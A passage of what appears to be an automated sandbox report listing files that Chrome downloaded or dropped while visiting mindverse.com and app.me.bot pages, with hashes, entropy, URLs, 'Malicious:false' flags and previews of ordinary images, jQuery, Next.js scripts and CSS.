                                      SHA-512:3E9CF7596BF40C1BADC4D8163177D8C5FD51B6736C305189B7084610D9DF42CAE1815878C367D33DE87CD3AA475D034B36D6A2887CC6C702204EC3C073ACB0BB
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004164/gif-2.gif
                                      Preview:GIF89a.........s..ROQ.pS....j.....#..zXHoG6OBD.Y<.n......E<:...:89..h?T...y...X:+....slfe......Z.{5'%...L-...o....w...5 ...qD2,.....3.k.b....c....j.{Z.c" !|z|.........))*..........k....c.......!)!'.........tss..............D($.........:1)[Z[........{Z.kW....................................~kt1-2}k.`MC.xd.....C..gOW..fvM^.Wa...wS......}...._.k.........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:B5AD7887CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:B5AD7888CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):10813
                                      Entropy (8bit):7.8305096157244
                                      Encrypted:false
                                      SSDEEP:192:SsGAF8np15Ha+aPcLERxTm5zew/otwKK4wBYtgZiZkSCorM49Mp:SB/1Y+aP1LaewQzbwBYtUd/or/9w
                                      MD5:CF205D8B6FAE21604FFB4A74A1F6C1B6
                                      SHA1:E4E53E4A7B4529D1A339482D2B2B64270F042958
                                      SHA-256:D6D1E0344FE039B196DB10EC30B7944B5BDDBF8B039866A33176AF87100BB6E8
                                      SHA-512:CE8B354362DCBCA5BFA2E409C87C62FD8F4DF78C26A281697CE68706126D67B38E0AAD00CB2ACD6801E0282EE88CD61F6463128D04CCB0160FF8E4AF8E28135F
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR...X...X......f......sRGB.........sBIT....|.d... .IDATx...O.].....`d3....4........loh......"..y.....FY...".[2o..Hl...h2......`..d.b..4..l.`.h_..v....:U..l..nW...o~U.N.............................................................................................................................................^.....}....?:......==...#.^P..b........g............$.h..@....g.....Fu{.....P.g.E`..j<...~l5....5.Q..c.!&.A`1......A@.%[.....^.C`...cJH......WC.]lN`q. ....8z..I..b@`U..g..B..^I...B...........*....Z..J.n..*.4.VM.V.}v.......U..U(a..}.~xu.{..^......+.......B.+...:,....JX.....B...+c.V.%.Z9.X..V..p>+O.+#...V.Y..X..W..f.C`u...`-......W.l.4...VG}...w]....L..J`u.......o..Y.2.z...W.L..y..g.^..L.:B\.0.......N...Vr.>.x...........X........@y..J...DV......X9...|.u.J`%...mp.=.[.-.W......X-.W.."..%.Z"..HMd.G`.@\..."....a.....Y..X..W.t..j..j.KD..:......q.@.......... 7"+>7.G...f.....VD.~~...........{.N\.+..?....<.z.....3X.8w.@)<Y........4w?.W.L.......4+g
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (10619)
                                      Category:downloaded
                                      Size (bytes):15874
                                      Entropy (8bit):5.323457612646575
                                      Encrypted:false
                                      SSDEEP:96:OVycz20I5gx2h6z5NgeujztZmVAmC00c352/5SABDSTWDVFcNs0xTlEurvd46xFg:K/INU7ovXE1UgG
                                      MD5:DC7291617483ACCB7F8C5F26F2AACFA6
                                      SHA1:465DFD3A2880EED10F542FA065718FD65FABDE51
                                      SHA-256:A250FCCF75B91157F37B3504A05E445B40B41EE53E0154378846B45B574DF57D
                                      SHA-512:D95CD9FF1A1620F6E323C29EB4BFAB933B81A858AD980925F74E461B0529938D4FA2595F2AB8BF6EC6B16A560BB8E2C2F243358E21BD0BCDAF237261073D342F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/home-mobile?_rsc=1m3fu
                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[50699,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","2445","static/chunks/app/(mobileLayout)/(PALayout)/home-mobile/page-c884621e7c19b09d.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[83321,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","9578","static/chunks/9578-a4316cb78831d4a3.js","4059","static/chunks/4059-ff6b23f1a12feb76.js","1025","static/chunks/1025-e8953ee90888594c.js","4595","static/chunks/4595-19c1c19690f67e9a.js","3927","static/chunks/3927-bc012ff258351a6d.js","4871","static/chunks/4871-53f6
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65447)
                                      Category:downloaded
                                      Size (bytes):89501
                                      Entropy (8bit):5.289893677458563
                                      Encrypted:false
                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                      Malicious:false
                                      Reputation:low
                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5054), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5054
                                      Entropy (8bit):5.4935193008951835
                                      Encrypted:false
                                      SSDEEP:96:vqRQeCGN+R/LARK/tE6J6ByOK2405bCmqEwZWqPWqas1054oELI/IMXgLqTM6:vwHCo+R/LAoVBJ6Ij2r5bCmqZdd10SoR
                                      MD5:1BEFA98BC40F8A5865BED4D36BC3BDB4
                                      SHA1:D08BDAEB49FD68DD5BFCA49756A07B1A8FD9C76D
                                      SHA-256:26FA2A92F79633B102D79C7FEF5B9BC4C1287021D3E1E25D4B62B65830CBED51
                                      SHA-512:7747D3A241F531C35CB82B63E4357849F9A1B1BF3D22A87873EB146352F79F2877E93B22D5CB31009D8D95C0CEEF973ADAC8D70D97AD873F76555A75B340F06B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(mobileLayout)/(PALayout)/memory-mobile/detail/page-574a969d58697e01.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8830],{18778:function(e,t,n){Promise.resolve().then(n.bind(n,59294))},16463:function(e,t,n){"use strict";var o=n(71169);n.o(o,"usePathname")&&n.d(t,{usePathname:function(){return o.usePathname}}),n.o(o,"useRouter")&&n.d(t,{useRouter:function(){return o.useRouter}}),n.o(o,"useSearchParams")&&n.d(t,{useSearchParams:function(){return o.useSearchParams}}),n.o(o,"useSelectedLayoutSegment")&&n.d(t,{useSelectedLayoutSegment:function(){return o.useSelectedLayoutSegment}}),n.o(o,"useSelectedLayoutSegments")&&n.d(t,{useSelectedLayoutSegments:function(){return o.useSelectedLayoutSegments}}),n.o(o,"useServerInsertedHTML")&&n.d(t,{useServerInsertedHTML:function(){return o.useServerInsertedHTML}})},59294:function(e,t,n){"use strict";n.r(t);var o=n(57437),r=n(16463),a=n(2265),i=n(22465),s=n(10433);let u=a.lazy(()=>Promise.all([n.e(8719),n.e(242),n.e(3106),n.e(8905),n.e(2853),n.e(8725),n.e(315),n.e(9369),n.e(8795),n.e(3882),n.e(7064),n.e(7487),n
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                      Category:downloaded
                                      Size (bytes):74966
                                      Entropy (8bit):5.43106390001723
                                      Encrypted:false
                                      SSDEEP:1536:cZUYlRE8FcWwReec4RCIuVFFExXpywUc/WpxYtaw/:cZUY/E8FcWwReec4Yj961J
                                      MD5:0351F1F91E118EE615B5A6DF7C736C1E
                                      SHA1:8FB3C26F788BA6DBE7834EE9659B285522A4EE6A
                                      SHA-256:238369111206FEEB037F63B43BA067D3CE0AA955F83F0A26DD682F4BC35E56F1
                                      SHA-512:63ACB39883250872E25D1D075FA4C7BAE14FCEA0644DF71C6EB2EA77CA3062DD82D33FA0619400D4DF47E9BBD5BBC3E03442B26F7370EC1FC48396397FB18572
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7320.a1826fc1128116e8.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7320],{17320:function(e,n,t){var i;!function(){var r,a="function"==typeof Object.defineProperties?Object.defineProperty:function(e,n,t){return e==Array.prototype||e==Object.prototype||(e[n]=t.value),e},o=function(e){e=["object"==typeof globalThis&&globalThis,e,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof t.g&&t.g];for(var n=0;n<e.length;++n){var i=e[n];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function s(e,n,t){return e.call.apply(e.bind,arguments)}function c(e,n,t){if(!e)throw Error();if(2<arguments.length){var i=Array.prototype.slice.call(arguments,2);return function(){var t=Array.prototype.slice.call(arguments);return Array.prototype.unshift.apply(t,i),e.apply(n,t)}}return function(){return e.apply(n,arguments)}}function l(e,n,t){return(l=Function.prototype.bind&&-1!=Function.prototype.bind.toString().indexOf("native code")?s:c).apply(null,arguments)}function d(
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):18391261
                                      Entropy (8bit):7.92549159103102
                                      Encrypted:false
                                      SSDEEP:393216:IdWKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXw:FKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXt
                                      MD5:91CB327F2E3688E1BF4E4AB2F8315DC9
                                      SHA1:3539A91624C57F0497F3D0748A9EC05980D7A770
                                      SHA-256:8FC48E857A97CA0A6CC325729858A2340932EC445A1E265788F6FC969F114756
                                      SHA-512:8540C627A1E18C9C9E09C34FDAA89771705ECBE06F07E7AC793004CD4F67E8B85146E0BCA2C7E854090F3DAC2EDA5439A08FE1372ACC88153B8473CF600993E9
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004165/gif-3.gif?number=0
                                      Preview:GIF89a.......L5-`X....-d{!.....J]..&..c........P*.......yy{.......+..x.~mP........uxVK._...f^@...e:1wyg.D)vo..b0zvE.n.LghzSO0.k....d9.Vk3..kW4..('"...1))...=**2) 3!!>).tjZ...<4(d;S...?23vif1.2..........hnAwJ=......hfVQ>;hegaNAfWVvos............R>9>J...aXf.N@.dR....bBvV[...PNL....ow.pf.........YS...KSi....u..c..xZUV.iPx....a.aB*.x.....4...}D.vC#.IO....*.yW.r`..L>.xE..............!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:FC0562B6CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:FC0562B7CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (2370), with no line terminators
                                      Category:downloaded
                                      Size (bytes):2370
                                      Entropy (8bit):5.140820975046583
                                      Encrypted:false
                                      SSDEEP:24:iVH8BKdUL/VV3AVtLVBpvLQpdpqg4pdpGLgI65rVDLVhtkfctmXt+wqpJt06QB83:OHafTuFVbvEPqPGCRHV492pIfCHeG
                                      MD5:66DD200EAEE0C44354B8D44E8D32C435
                                      SHA1:6D25C977E7E4F1CC87A20934ABB5766C65875ADE
                                      SHA-256:FAB058030283ACF162DFB54E7D559907B8281907B5514D77C908787AA8FE5F55
                                      SHA-512:B3C23813A8AD06C0EB042660CDEBBFB808747AA76C21073EC5ACCB4364F4D24492D49FC02FDBBE27FFF0D271459288F94570BB5A51DEF9979B46A142786F2369
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/bbc59624ac1cc1ca.css
                                      Preview:.index_actionButtons__2_1_c{display:flex;flex-direction:row;align-items:center}.index_actionButtons__2_1_c>*+*{margin-left:20px}.index_actionButtons__2_1_c button{margin-top:12px}.index_actionButtons__2_1_c .index_cancelButton__NXs1K{font-size:14px;line-height:22px;padding:5px 16px;color:var(--primary-color);background-color:transparent;border:1px solid var(--primary-color);border-radius:2px;cursor:pointer}.index_container__qdATK{display:flex;flex-direction:row;align-items:center;justify-content:space-between;padding:9px 39px 9px 23px;background-color:var(--primary-white);border:1px solid #eee9e4;border-radius:16px}.index_container__qdATK .index_applyLayoutText__UBh4M{gap:8px}.index_container__qdATK .index_applyLayoutText__UBh4M .index_applyLayoutTextTitle__4J5jp{color:var(--primary-black);font-weight:500;font-size:14px;line-height:24px}.index_container__qdATK .index_applyLayoutText__UBh4M .index_applyLayoutTextDescLayout__FVcZS{display:flex;flex-direction:row;color:var(--primary-black
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (3160), with no line terminators
                                      Category:downloaded
                                      Size (bytes):3160
                                      Entropy (8bit):4.998643546884528
                                      Encrypted:false
                                      SSDEEP:24:E4mM8V3PuotH4Y4uieu1sjj/s7978V3P4UDVFVLDsLVLQe1VLhT9VLkeuVQ6e1Vy:RM/dV/j+hM/K5z9KkCXQ550L8kSo
                                      MD5:0D34BD738784363FDF14F6F0A8DC1E67
                                      SHA1:FB27F3BCA202741AC95C5132236A72C81902A12D
                                      SHA-256:F47FF78BE83D479B0C1DB32A74E56733A4090A03AD45E9B5C52D5C0FB72AEDE1
                                      SHA-512:737AC53C256ADD5B937C480B06453A34F783C9DAF12ABE52BEABC294164591E5BD4FD15F2D2CEECEF4F49CE3121F68BCA3405BA75488D1BC428D9421FA76DC78
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/c25e179a3cd39c3d.css
                                      Preview:.index_container__oGr1U{display:flex;flex-direction:column;gap:24px;width:100%}.index_container__oGr1U .index_title__0RqxG{display:flex;flex-direction:row;gap:12px;align-items:center;align-self:stretch;height:36px;padding:6px 12px;background:#fefdff;border:1px solid #eee9e4;border-radius:8px}.index_container__oGr1U .index_title__0RqxG .index_input__8mpXF{display:flex;flex-direction:column;flex-grow:1;gap:8px;height:24px;padding:0;color:#160a0a;font-weight:400;font-size:14px;font-family:Helvetica Neue,sans-serif;line-height:24px;border:none;outline:none}.index_container__oGr1U .index_timeContainer__CIpeQ{display:flex;flex-direction:column;align-self:stretch;width:100%;padding:0;background:#fefdff;border:1px solid #f0ebe5;border-radius:8px;box-shadow:0 4px 32px 0 hsla(35,42%,59%,.08)}.index_container__oGr1U .index_line__rQndd{display:flex;flex-direction:row;gap:16px;align-items:center;align-self:stretch;height:36px;padding:6px 8px 6px 16px}.index_container__oGr1U .index_line__rQndd .ant-
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (7976), with no line terminators
                                      Category:downloaded
                                      Size (bytes):7976
                                      Entropy (8bit):5.25646299294178
                                      Encrypted:false
                                      SSDEEP:96:j00WqRjBTeX8QkxqXUV9/7AV/1LmJo3LSRLl2I264GUDWgXis:joGxqXUvMV/1iJo3cgx6CDWgXis
                                      MD5:7BADFC4C1401AF6BF14D3B783322D8DA
                                      SHA1:7BB16CB1237B1310ADFA21983D2625DAE2F6B21C
                                      SHA-256:D6B165743B1C8A43B92F98779D495E5F969BB10B6B9BFFE624BBEA69FA2174CB
                                      SHA-512:E526FD50CECEB6B40094A02276E596B8202F27501B445A1FC38856DD2D437251EC2D28C70B3B2420FC6E91180E8F12F8EC4F0562F9E0EED4ECD4C76C6DBC4B10
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/3ff2fc484e01aa8d.css
                                      Preview:.ChatApp_container__QPJ_V a:hover,.ChatApp_container__QPJ_V a:link,.ChatApp_container__QPJ_V a:visited{color:#2643fd}.ChatApp_container__QPJ_V .ChatApp_chatContainer__3chvI{flex:1}.index_flashback__a1BBf{position:relative;background-clip:padding-box;display:flex;align-items:center;border-radius:20px;padding:8px 10px 8px 14px;opacity:1;background:rgba(254,253,255,.5);box-sizing:border-box;box-shadow:0 8px 32px 0 hsla(35,42%,59%,.15);gap:6px;transition:opacity .3s,background .3s;cursor:pointer}.index_flashback__a1BBf .index_icon__sTHj6{width:20px;height:20px;flex-shrink:0;border-radius:50%;background:#fefdff;box-sizing:border-box;border:1px solid #f0ebe5;box-shadow:0 4px 32px 0 hsla(35,42%,59%,.08);display:flex;align-items:center;justify-content:center}.index_flashback__a1BBf.index_hidden__4rV2i{opacity:0;cursor:default}.index_flashback__a1BBf.index_inChat__CLY4a{padding:8px 10px;max-width:280px}.index_flashback__a1BBf:after{position:absolute;z-index:1;padding:1px;background:linear-gradi
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (6311)
                                      Category:downloaded
                                      Size (bytes):10371
                                      Entropy (8bit):5.368661168570967
                                      Encrypted:false
                                      SSDEEP:96:4FfrQtxNzLpQom+0I3wk2hWfJrdzmQWsu6yv4KEqXsbPUAf/5XnG:Wfry0jEqiRG
                                      MD5:B0A87F2B037D50680975A77031E40DC2
                                      SHA1:3A6286D98E6BD05EDCF3A7D63977C7245C4D0CF8
                                      SHA-256:4D5A4FE40768BAB8E8CDDEE38C1F2D7C3A9D0AB7ED2E4C0E073A4E10CEE9C4E8
                                      SHA-512:1AA197DDF1D42D15C482CE663127429C32503303D3229E88F15D4AB5B9404068E665E80110216E941C7FD1D8D872459A7A7257AE566932114EAD67FB5009AC88
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252F&_rsc=ftx5s
                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[53383,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","4595","static/chunks/4595-19c1c19690f67e9a.js","6494","static/chunks/6494-ed88a2adc46e7b33.js","4871","static/chunks/4871-53f67f62764665d5.js","114","static/chunks/114-d3df8482d6fc925d.js","5204","static/chunks/5204-55e577bed4f36b3d.js","7513","static/chunks/app/(nolayout)/login/page-8c894cabcf8ca401.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[10804,["5681","static/chunks/5681-43d82f1a3d805e0d.js","2973","static/chunks/2973-d52b6c4a073fa583.js","3124","st
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (37344), with no line terminators
                                      Category:downloaded
                                      Size (bytes):37460
                                      Entropy (8bit):5.559529288606213
                                      Encrypted:false
                                      SSDEEP:384:CKw3S86+rFv/2ebH4ILObosjPe5KItdz/u3Km+A0flzkBQPzgZ8JK752SVhK57q6:m39SJU/s+fSV8UNSql402
                                      MD5:B5D0538B07E9D3A382BE75FF40E67046
                                      SHA1:43F3B9E55D226EF30963C93600D3E7384C92D01B
                                      SHA-256:FF24803E34EB95109BFB0ADF93FF1BB643CCDDCBBBA7EC2B76511A23FE1F97B0
                                      SHA-512:DBA10256B7413426512C0A254D0A95411D9C6B82F4CC58A5A057ABE679EE058E351DE911EF687D0471505547A8EF7023B3F7F4848A25D08890A87E8C0FFF23C5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/5204-55e577bed4f36b3d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5204],{96859:function(e,n,a){"use strict";var i,t=a(4410);function l(){return(l=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var a=arguments[n];for(var i in a)Object.prototype.hasOwnProperty.call(a,i)&&(e[i]=a[i])}return e}).apply(this,arguments)}n.Z=function(e){return t.createElement("svg",l({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 1000 1000"},e),i||(i=t.createElement("path",{d:"M833.36 166.65H166.7c-45.83 0-82.92 37.5-82.92 83.33l-.42 500c0 45.83 37.5 83.33 83.33 83.33h666.67c45.84 0 83.34-37.5 83.34-83.33v-500c0-45.83-37.5-83.33-83.34-83.33ZM816.7 343.73 522.11 527.9c-13.33 8.33-30.83 8.33-44.17 0L183.36 343.73c-10.42-6.67-16.67-17.92-16.67-30 0-27.92 30.42-44.58 54.17-30l279.17 174.58L779.2 283.73c23.75-14.58 54.16 2.08 54.16 30 0 12.08-6.25 23.33-16.66 30"})))}},28441:function(e,n,a){"use strict";a.d(n,{U2:function(){return r},ZP:function(){return ep}});var i,t,l,s,r,o,d=a(57437)
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):19703
                                      Entropy (8bit):6.035262015354536
                                      Encrypted:false
                                      SSDEEP:384:+ofF+Hc9XYiF8Xzs/URODNAMs5VAqRoqBA8r9TpcSGdOSblGnga:+U2uXZFCs/URGNADV1RoqDtcrdOSbs7
                                      MD5:C12D0BB67E8964BB1F06F4F710B49F91
                                      SHA1:E60736C2B1784965A7C7B51D8BF02885E43431EE
                                      SHA-256:CB39351324BF81EB94381236B30D0C4D1466AC776FACD5993DEA06E4D3EB9A92
                                      SHA-512:D32DEAD7411B00C61EB1E252D438509BE18F97DEAC6CDED96CBDC35D47ADA55AB0BDB3FADB18D220E1309DD783BF230CF3B248C4D50E7B22643901267741D144
                                      Malicious:false
                                      Reputation:low
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="149.52000427246094" height="48" viewBox="0 0 149.52000427246094 48"><defs><pattern x="0" y="0" width="149.52000427246094" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_089962"><image x="0" y="-6.857882723920738e-7" width="149.52000427246094" height="48.000001371576545" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAm8AAADICAYAAAC+sAb3AAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7d15mJzVeSb8+7y1d/WuBbXQgoSEBJLAIDtIwjYlBxsLgUlw2DzJF8jEdmYSvAwZksn32ZQyiRM7+AuE4DF4kYidIUgOEzbJwtgqsGkBRmZTC+1rd0u9r7W82znzR1W1qlu9VHXXXvfvuvq61K3qqrdEv5y7n3POcwRoSru2qoAEAsnPhcD14zwsMM7XQmO/oBReAQAt8Xeb7hUXPIaIiKhQ1K51AWhaYOQLQo0e89Q44524cLyLP1a8AilH/k5sen38x1FGRKEvoJi8uFUFk39OBLRAnl46BMSDHUMdERHlg9q9ITjyiVDXjxvKciEZ9FKCHUNdZio6vCXDmhB4sMCXMp4QAAiFLQxyREQ0U+fDmiq+MS8Z6Gy1BWCYm0pFhbeUsJbPqlq2hACGOSIiSs9IWMtnVS1bUsIcg9yFyj68FXl1bSZCDHJERJTq/Hq1IqyuzYRAiEHuvLINby
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (38385), with no line terminators
                                      Category:downloaded
                                      Size (bytes):38385
                                      Entropy (8bit):5.455067389841409
                                      Encrypted:false
                                      SSDEEP:768:TpCZlLco3KLPtt8T0YYfKGBCY9dP/KaV9l4C:lCZlL2LPtti0YYtBCY9dP/K0l4C
                                      MD5:CEA8EE117E6D0852BD735815A040FC0A
                                      SHA1:C0EAAFA1203692F4E2221CCAC1BF65E8404A1764
                                      SHA-256:2DA101B31983BB7F126E14365CDF967BB14215BC9ABFB74C2041A1D7BB3D9AC7
                                      SHA-512:85720351CA399294A3E2C354ACB06428AE97A499321EBDB11E617BD313D24008A4B48DD9BFA35DD58B0934778BB2B6562930077693B9F10633E7F53D8A02C0B5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4059-ff6b23f1a12feb76.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4059],{84059:function(e,t,s){let n;s.d(t,{V5:function(){return w},vV:function(){return O},KC:function(){return C},Pn:function(){return k},lR:function(){return P},zK:function(){return z},sb:function(){return L},QB:function(){return M}});var i,o,r,a,c,l,u,d,h,f,g,p,_,v,m,b,y,S,I,k,C,M,E,w,L,O,T,P,R,U,N,A=s(11735);class D{constructor(){this._dataLength=0,this._bufferLength=0,this._state=new Int32Array(4),this._buffer=new ArrayBuffer(68),this._buffer8=new Uint8Array(this._buffer,0,68),this._buffer32=new Uint32Array(this._buffer,0,17),this.start()}static hashStr(e,t=!1){return this.onePassHasher.start().appendStr(e).end(t)}static hashAsciiStr(e,t=!1){return this.onePassHasher.start().appendAsciiStr(e).end(t)}static _hex(e){let t,s,n,i;let o=D.hexChars,r=D.hexOut;for(i=0;i<4;i+=1)for(n=0,s=8*i,t=e[i];n<8;n+=2)r[s+1+n]=o.charAt(15&t),t>>>=4,r[s+0+n]=o.charAt(15&t),t>>>=4;return r.join("")}static _md5cycle(e,t){let s=e[0],n=
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5212), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5212
                                      Entropy (8bit):5.490447301847884
                                      Encrypted:false
